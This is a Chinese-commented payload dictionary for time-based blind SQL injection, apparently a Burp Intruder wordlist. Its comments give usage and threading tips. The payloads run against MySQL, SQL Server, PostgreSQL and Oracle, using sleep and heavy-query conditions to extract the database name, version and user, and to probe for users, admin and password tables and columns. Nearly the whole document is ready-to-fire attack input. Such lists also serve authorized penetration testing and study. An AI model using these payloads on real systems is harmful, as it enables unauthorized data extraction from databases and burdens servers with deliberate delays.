# ============================================================
# SQL Injection Payload Dictionary — 07 时间盲注类
# 用途: 页面完全无差异（错误/成功都一样）时，通过延时分判
# 原理: IF(condition, sleep(N), 0) — 条件真则延迟
# 使用: 在 Burp 中按响应时间排序，明显延迟的即为真条件
# 建议: Resource Pool 设置线程数 1~3，超时 30s+
# ============================================================

# ========== MySQL — SLEEP() ==========

# 基础延时检测
AND SLEEP(5)
OR SLEEP(5)
AND SLEEP(10)
OR SLEEP(10)
AND SLEEP(5)--
OR SLEEP(5)--

# 条件延时 — 数据库名长度判断
AND IF(LENGTH(database())=1,SLEEP(5),0)
AND IF(LENGTH(database())=2,SLEEP(5),0)
AND IF(LENGTH(database())=3,SLEEP(5),0)
AND IF(LENGTH(database())=4,SLEEP(5),0)
AND IF(LENGTH(database())=5,SLEEP(5),0)
AND IF(LENGTH(database())=6,SLEEP(5),0)
AND IF(LENGTH(database())=7,SLEEP(5),0)
AND IF(LENGTH(database())=8,SLEEP(5),0)
AND IF(LENGTH(database())=9,SLEEP(5),0)
AND IF(LENGTH(database())=10,SLEEP(5),0)

# 条件延时 — 数据库名字符判断（二分法）
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))>97,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))>110,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))>120,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=97,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=98,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=99,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=100,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=101,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=102,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=103,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=104,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=105,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=106,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=107,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=108,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=109,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=110,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=111,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=112,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=113,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=114,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=115,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=116,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=117,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=118,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=119,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=120,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=121,SLEEP(5),0)
AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=122,SLEEP(5),0)

# 条件延时 — 版本判断
AND IF(SUBSTRING(version(),1,1)='5',SLEEP(5),0)
AND IF(SUBSTRING(version(),1,1)='8',SLEEP(5),0)

# 条件延时 — 用户权限
AND IF(SUBSTRING(user(),1,4)='root',SLEEP(5),0)

# 条件延时 — 表存在性判断
AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE TABLE_NAME='users')>0,SLEEP(5),0)
AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE TABLE_NAME='admin')>0,SLEEP(5),0)

# 条件延时 — 列存在性判断
AND IF((SELECT COUNT(*) FROM information_schema.columns WHERE TABLE_NAME='users' AND COLUMN_NAME='password')>0,SLEEP(5),0)

# 无需 IF 的延时写法
AND (SELECT COUNT(*) FROM information_schema.columns A, information_schema.columns B) > 0
AND SLEEP(IF(LENGTH(database())=8,5,0))

# BENCHMARK（MySQL 备选，非 SLEEP）
AND BENCHMARK(50000000,MD5(1))
OR BENCHMARK(50000000,MD5(1))
AND BENCHMARK(100000000,MD5(1))
AND IF(LENGTH(database())=8,BENCHMARK(50000000,MD5(1)),0)

# 子查询方式
AND (SELECT * FROM (SELECT(SLEEP(5)))a)
AND (SELECT * FROM (SELECT(SLEEP(IF(LENGTH(database())=8,5,0))))a)

# ========== SQL Server — WAITFOR DELAY ==========

; WAITFOR DELAY '0:0:5'--
; WAITFOR DELAY '0:0:10'--
AND 1=1; WAITFOR DELAY '0:0:5'--
AND 1=2; WAITFOR DELAY '0:0:5'--
IF (LEN(DB_NAME())=8) WAITFOR DELAY '0:0:5'--
IF (ASCII(SUBSTRING(DB_NAME(),1,1))>97) WAITFOR DELAY '0:0:5'--

# 条件延时（SQL Server 用 CASE WHEN）
AND (SELECT CASE WHEN LEN(DB_NAME())=8 THEN WAITFOR DELAY '0:0:5' ELSE NULL END)=null--

# ========== PostgreSQL — PG_SLEEP() ==========

AND PG_SLEEP(5)--
OR PG_SLEEP(5)--
AND PG_SLEEP(10)--
OR PG_SLEEP(10)--

# 条件延时
AND (SELECT CASE WHEN LENGTH(current_database())=8 THEN PG_SLEEP(5) ELSE 0 END)=0--
AND (SELECT CASE WHEN ASCII(SUBSTRING(current_database(),1,1))>97 THEN PG_SLEEP(5) ELSE 0 END)=0--

# ========== Oracle — DBMS_LOCK.SLEEP / DBMS_PIPE ==========

AND DBMS_LOCK.SLEEP(5)--
AND DBMS_LOCK.SLEEP(10)--
AND DBMS_PIPE.RECEIVE_MESSAGE('x',5)--
AND DBMS_PIPE.RECEIVE_MESSAGE('x',10)--

# Oracle 条件延时（需有 EXECUTE 权限）
AND (SELECT CASE WHEN LENGTH((SELECT ora_database_name FROM dual))=8 THEN DBMS_PIPE.RECEIVE_MESSAGE('x',5) ELSE NULL END FROM dual) IS NULL--

# ========== 通用 — 重查询延时（所有数据库通用，但慢）=========
# 原理: 笛卡尔积大量数据使查询变慢，不依赖 sleep 函数
AND (SELECT COUNT(*) FROM information_schema.columns A, information_schema.columns B) > 0--
AND (SELECT COUNT(*) FROM information_schema.tables A, information_schema.tables B) > 0--
